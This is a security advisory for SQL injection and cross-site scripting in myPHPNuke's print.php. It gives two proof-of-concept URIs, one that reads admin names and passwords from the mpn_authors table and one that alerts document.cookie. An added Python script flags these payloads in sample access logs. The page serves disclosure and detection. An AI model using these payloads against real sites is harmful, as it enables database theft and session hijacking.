myPHPNuke 'print.php' SQL Injection and Cross-Site Scripting Vulnerabilities
BID:30942
Info
| Bugtraq ID: | 30942 |
| Class: | Input Validation Error |
| CVE: | CVE-2008-4088, CVE-2008-4089 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 31 2008 12:00AM |
| Updated: | Sep 27 2010 05:10PM |
| Credit: | MustLive |
| Vulnerable: | myPHPNuke 1.8.8 _final_7; myPHPNuke 1.8.8; myPHPNuke 1.8.8_8; myPHPNuke 0 |
| Not Vulnerable: | myPHPNuke 1.8.8_8rc2 |
Discussion
myPHPNuke is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Attackers may exploit the SQL-injection issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to myPHPNuke 1.8.8_8rc2 are vulnerable.
NOTE: myPHPNuke 1.8.8_8rc2 has been reported still vulnerable to certain limited SQL-injection attacks.
Exploit / POC
An attacker can exploit these issues through a browser. To exploit the cross-site scripting issue, the attacker must entice an unsuspecting user to follow a malicious URI.
The following proof-of-concept URIs are available:
http://www.example.com/print.php?sid=%3CBODY%20onload=alert(document.cookie)%3E
http://www.example.com/print.php?sid=-1%20union%20select%20null,null,aid,pwd,null,null%20from%20mpn_authors%20limit%200,1
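Both proof-of-concept URIs above abuse the `sid` parameter of print.php, which the application expects to be a numeric story id. As an added example that is not part of the advisory, the following Python script scans constructed web-server access-log lines (Common Log Format, with request paths modelled on the two URIs above) and reports print.php requests whose decoded `sid` is not an integer, labelling each as SQL-injection-like or script-injection-like; the IP addresses and timestamps are constructed sample values.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines: two mirror the advisory's proof-of-concept
# URIs, the other two are ordinary requests that must not be flagged.
SAMPLE_LOG = """\
203.0.113.5 - - [31/Aug/2008:10:01:02 +0000] "GET /print.php?sid=%3CBODY%20onload=alert(document.cookie)%3E HTTP/1.1" 200 512
203.0.113.5 - - [31/Aug/2008:10:01:09 +0000] "GET /print.php?sid=-1%20union%20select%20null,null,aid,pwd,null,null%20from%20mpn_authors%20limit%200,1 HTTP/1.1" 200 734
198.51.100.7 - - [31/Aug/2008:10:02:00 +0000] "GET /print.php?sid=42 HTTP/1.1" 200 2048
198.51.100.7 - - [31/Aug/2008:10:02:30 +0000] "GET /index.php HTTP/1.1" 200 4096
"""

# Common Log Format: client, ident, user, [timestamp], "METHOD path PROTOCOL"
REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*"')
SQLI_RE = re.compile(r'\b(union|select|from|limit)\b', re.IGNORECASE)
XSS_RE = re.compile(r'<|>|\bon\w+\s*=|javascript:', re.IGNORECASE)


def classify_sid(value):
    """Return 'ok', 'sqli', 'xss' or 'suspect' for an already URL-decoded sid value.
    print.php takes a numeric story id, so anything but an integer is suspect."""
    if re.fullmatch(r'-?\d+', value):
        return "ok"
    if SQLI_RE.search(value):
        return "sqli"
    if XSS_RE.search(value):
        return "xss"
    return "suspect"


def scan_log(text):
    """Return (ip, timestamp, verdict, decoded sid) for every print.php request
    whose sid parameter is not a plain integer."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("path"))
        if parts.path != "/print.php":
            continue
        # parse_qs percent-decodes the values, so the checks see the real payload.
        for sid in parse_qs(parts.query, keep_blank_values=True).get("sid", []):
            verdict = classify_sid(sid)
            if verdict != "ok":
                findings.append((m.group("ip"), m.group("ts"), verdict, sid))
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```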
Solution / Fix
Solution:
The vendor has addressed these issues in myPHPNuke 1.8.8_8rc2.
NOTE: myPHPNuke 1.8.8_8rc2 has been reported still vulnerable to certain limited SQL-injection attacks.
References
References:
- myPHPNuke Homepage (myPHPNuke)
- myPHPNuke Project Page (myPHPNuke)